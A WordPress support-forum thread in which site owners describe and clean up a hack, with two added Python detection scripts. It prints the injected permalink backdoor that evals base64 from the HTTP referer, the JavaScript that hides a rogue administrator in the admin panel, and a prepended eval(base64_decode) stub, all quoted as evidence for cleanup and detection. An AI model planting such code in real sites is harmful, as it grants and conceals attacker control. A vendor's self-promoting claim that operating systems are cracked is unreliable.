• Resolved benanne

    (@benanne)


    I figure my blog got hacked. It’s my own fault for being too lazy to upgrade, but I thought I’d describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my “permalinks” setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called “JohnFisher76” also had admin rights. I’d had a few spam registrations before so I hadn’t paid attention to this. I wish I had…

    This user’s username was… a bit weird. It looked like this:

    ...
    
    <div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
        try{
            // Walk up from the injected div to the table row listing this user and delete it
            var t=document.getElementById("user_superuser");
            while(t.nodeName!="TR"){
                t=t.parentNode;
            };
            t.parentNode.removeChild(t);
            // Decrement the "N users shown below" heading so the count still adds up
            var tags = document.getElementsByTagName("H3");
            var s = " shown below";
            for (var i = 0; i < tags.length; i++) {
                var t=tags[i].innerHTML;
                var h=tags[i];
                if(t.indexOf(s)>0){
                    s =(parseInt(t)-1)+s;
                    h.removeChild(h.firstChild);
                    t = document.createTextNode(s);
                    h.appendChild(t);
                }
            }
            // Decrement the "Administrator (N)" role filter link in the .subsubsub list
            var arr=document.getElementsByTagName("ul");
            for(var i in arr) if(arr[i].className=="subsubsub"){
                var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
                if(n[1]>0){
                    var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
                    arr[i].innerHTML=txt;
                }
            }
        }catch(e){};
    };
    addLoadEvent(setUserName);
    </script></div>

    I haven’t bothered to try and interpret what this does, but I guess it’s used to hide the fact that there is another administrator in the admin panel. I don’t know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that’s fixed it. I hope this thing hasn’t left anything else behind that could come back to haunt me…
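The script in the username only changes what the admin page renders; the database still holds the extra administrator. Added example, not from the original post: a Python check that reads administrators straight from wp_usermeta, flags logins containing HTML, and looks for eval/base64_decode in the permalink-related option rows, run against a constructed in-memory copy of the three tables.

```python
import re
import sqlite3

# Constructed fixture: the three WordPress tables named in the post, reduced to the
# columns these checks need. The rogue login is modelled on the one quoted above.
SAMPLE_SQL = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT);
CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
INSERT INTO wp_users VALUES (1, 'benanne');
INSERT INTO wp_users VALUES (2, 'JohnFisher76<div id="user_superuser"><script>var setUserName=function(){};</script></div>');
INSERT INTO wp_users VALUES (3, 'reader');
INSERT INTO wp_usermeta VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO wp_usermeta VALUES (2, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO wp_usermeta VALUES (3, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}');
INSERT INTO wp_options VALUES ('permalink_structure', '${eval(base64_decode($_SERVER[HTTP_REFERER]))}');
INSERT INTO wp_options VALUES ('blogname', 'My blog');
"""

HTML_IN_LOGIN = re.compile(r"<\s*/?[a-z]", re.I)  # anything tag-like inside a login name
CODE_IN_OPTION = re.compile(r"eval\s*\(|base64_decode", re.I)

def load_sample():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SQL)
    return conn

def list_admins(conn):
    """Administrators read straight from wp_usermeta, which a UI-hiding script cannot
    suppress. Returns (ID, user_login, login_contains_html) per admin."""
    rows = conn.execute(
        "SELECT u.ID, u.user_login FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key LIKE '%capabilities' AND m.meta_value LIKE '%\"administrator\"%' "
        "ORDER BY u.ID").fetchall()
    return [(uid, login, bool(HTML_IN_LOGIN.search(login))) for uid, login in rows]

def tainted_options(conn):
    """Option rows the thread says get abused, checked for eval/base64_decode."""
    rows = conn.execute(
        "SELECT option_name, option_value FROM wp_options WHERE option_name IN "
        "('permalink_structure', 'rewrite_rules', '_transient_rewrite_rules')").fetchall()
    return sorted(name for name, value in rows if CODE_IN_OPTION.search(value or ""))

if __name__ == "__main__":
    db = load_sample()
    for uid, login, has_html in list_admins(db):
        print(uid, repr(login[:40]), "HTML in login: hidden admin?" if has_html else "")
    print("tainted options:", tainted_options(db))
```

Against a real install, replace load_sample() with a connection to the live database (and the matching table prefix) and compare the returned admin count with what the Users page shows.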

Viewing 12 replies - 1 through 12 (of 12 total)
  • Hi

    I’ve experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?

    Thanks!

    Thread Starter benanne

    (@benanne)

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don’t think that had any effect.

    At any rate it can’t hurt to search the “options” table for any reference to “eval” or “base64” and clean that up. It also appeared in a row in “options” called “rewrite_rules”, I think. But that disappeared once I changed the setting back.

    As I said, I don’t know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

    Check this thread:
    https://www.ads-software.com/support/topic/307518

    and upgrade WordPress.

    Thread Starter benanne

    (@benanne)

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

    I've just cleaned this stuff in “permalinks” and changed my admin password.

    All works.

    P.S. Do backups – it saves you time.

    Thread Starter benanne

    (@benanne)

    If I were you, I would check my user list to see if there are any admins in there that shouldn’t be there…

    Thread number three
    https://www.ads-software.com/support/topic/307518?replies=15
    https://www.ads-software.com/support/topic/297639

    It seems that this already started a couple of weeks ago, judging by the oldest thread. Some automatic attack, I guess.

    My site got nailed too. I didn’t think anything of it when I had a couple of “admin” users added to the site. Thought it was just spam. But I had two additional “admins” with “contributor” status and they were able to change the Permalinks URL structure. Argghh.

    problem solved … https://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    In the wp_options table, clear the row named _transient_rewrite_rules and set the permalink from the WP config again!!!

    Check all your databases for infection:

    From SSH, use grep to search for particular strings in all databases on the server:

    grep -H -r "eval(base64_decode" /var/lib/mysql
    grep -H -r "var setUserName = function" /var/lib/mysql

    have a nice day …

    Well, happy to say that it's not your fault!

    The hacks are coming from lower layers than WP itself; we suspect the OSes themselves are cracked.

    Frankly, the only ‘real’ way to monitor and know if you have been hacked would be to monitor for malware, which we offer for free at: https://www.sitesecuritymonitor.com

    We also offer a free WP security plugin to lock down all versions of WordPress. This works in 98% of the cases (download here: https://www.ads-software.com/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) – however, in this case, if you are hosted with GoDaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution), the plugin wouldn’t help much.


    I have a similar problem on Dreamhost, all of my WP files have been injected with this at the start:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f.... etc

    @jremillard, do you think I’m being hacked via WordPress, or some other way?

    So sick of this happening.

    Thanks.

    Moderator James Huff

    (@macmanx)

    The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent “in the clear” via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you’re on a PC or Cyberduck if you’re on a Mac.

    To clean out the current hack, carefully follow this guide:

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked
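Added example, not from the thread, the linked guide, or WordPress: a Python scanner for the prepended eval(base64_decode(...)) stub described above, run over a constructed sample tree; it lists affected .php files and strips the stub after writing a .bak copy. The stub's exact shape (a single statement, optionally closed by ?>) is an assumption drawn from the fragment quoted earlier in the thread.

```python
import os
import re
import tempfile

# The stub quoted in the thread: one eval(base64_decode("...")); statement prepended
# to each .php file. The closing ?> is optional in case a variant omits it.
INJECTED = re.compile(
    rb'\A<\?php\s*/\*\*/\s*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\s*(?:\?>)?[ \t]*\r?\n?')

def find_injected(root):
    """Return every .php file under root whose first bytes are the injected stub."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    head = fh.read(4096)  # the stub sits at the very start of the file
                if INJECTED.match(head):
                    hits.append(path)
    return sorted(hits)

def strip_injected(path):
    """Remove the stub from one file, writing a .bak copy first. True if changed."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, n = INJECTED.subn(b"", data, count=1)
    if n == 0:
        return False
    with open(path + ".bak", "wb") as bak:
        bak.write(data)
    with open(path, "wb") as fh:
        fh.write(cleaned)
    return True

def make_sample_tree():
    """Constructed fixture: an injected index.php, a clean plugin file, a non-PHP file."""
    root = tempfile.mkdtemp(prefix="wp_sample_")
    os.makedirs(os.path.join(root, "wp-content"))
    # base64 fragment is the truncated one quoted in the thread, not a working payload
    stub = b'<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f")); ?>\n'
    files = {
        "index.php": stub + b"<?php\nrequire('./wp-blog-header.php');\n",
        "wp-content/clean.php": b"<?php\necho 'fine';\n",
        "readme.txt": stub,
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return root
```

Point find_injected() at a real document root and review the list before calling strip_injected() on each hit; the .bak copies keep the evidence for later analysis.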

  • The topic ‘eval(base64_decode(…)) in permalinks’ is closed to new replies.